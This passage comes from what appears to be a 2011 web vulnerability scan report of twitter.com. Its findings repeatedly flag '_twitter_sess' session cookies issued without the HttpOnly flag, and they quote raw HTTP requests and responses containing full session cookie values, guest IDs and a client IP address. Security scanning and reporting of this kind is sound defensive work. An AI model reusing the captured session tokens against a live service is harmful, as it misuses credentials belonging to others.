_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rem HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.158. http://twitter.com/rickrussie previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rickrussie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.159. http://twitter.com/rickrussie/status/28548182396903424 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rickrussie/status/28548182396903424

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTExNDc5ZjQ5%250AMmU2NjM5OTY2ODQ3NTY5ZjUxYWFlNjlmOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--3d3bd2cab72fb51e93b5fed240300828d4f6844c; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rickrussie/status/28548182396903424 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.160. http://twitter.com/roctimo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/roctimo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.161. http://twitter.com/roctimo/status/29669358812790784 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/roctimo/status/29669358812790784

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6DGNzcmZfaWQiJWRhM2Y2NDUyMWY4%250AOWYxMzc2YjkzMTBhNGFhODkyOTBlOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--160e3ed7351db2a00b10df68a0ea6d7aa90fed75; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.162. http://twitter.com/rwaldron previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rwaldron

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rwaldron HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.163. http://twitter.com/ryanolson previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ryanolson

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ryanolson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.164. http://twitter.com/scott_gonzalez previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/scott_gonzalez

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scott_gonzalez HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.165. http://twitter.com/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47325-41983
ETag: "98f573cd8faa541b15eed6e89977a1f8"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.07569
Content-Type: text/html; charset=utf-8
Content-Length: 19528
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

11.166. http://twitter.com/sentience previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sentience

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sentience HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.167. http://twitter.com/sessions/destroy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sessions/destroy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sessions/destroy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 404 Not Found
Date: Fri, 28 Jan 2011 14:31:21 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296225081-37787-17414
Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.168. http://twitter.com/share previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/share

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 403 Forbidden
Date: Sat, 29 Jan 2011 01:52:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296265971-85703-18326
Last-Modified: Sat, 29 Jan 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

11.169. http://twitter.com/signup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/signup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 302 Found
X-Transaction: 1296224738-57578-22704
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
Location: https://twitter.com/signup
X-Runtime: 0.00757
Content-Type: text/html; charset=utf-8
Content-Length: 92
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="https://twitter.com/signup">redirected</a>.</body></html>

11.170. http://twitter.com/simplemodal previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/simplemodal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /simplemodal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.171. http://twitter.com/sitepointdotcom previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sitepointdotcom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitepointdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.172. http://twitter.com/slaterusa previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/slaterusa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
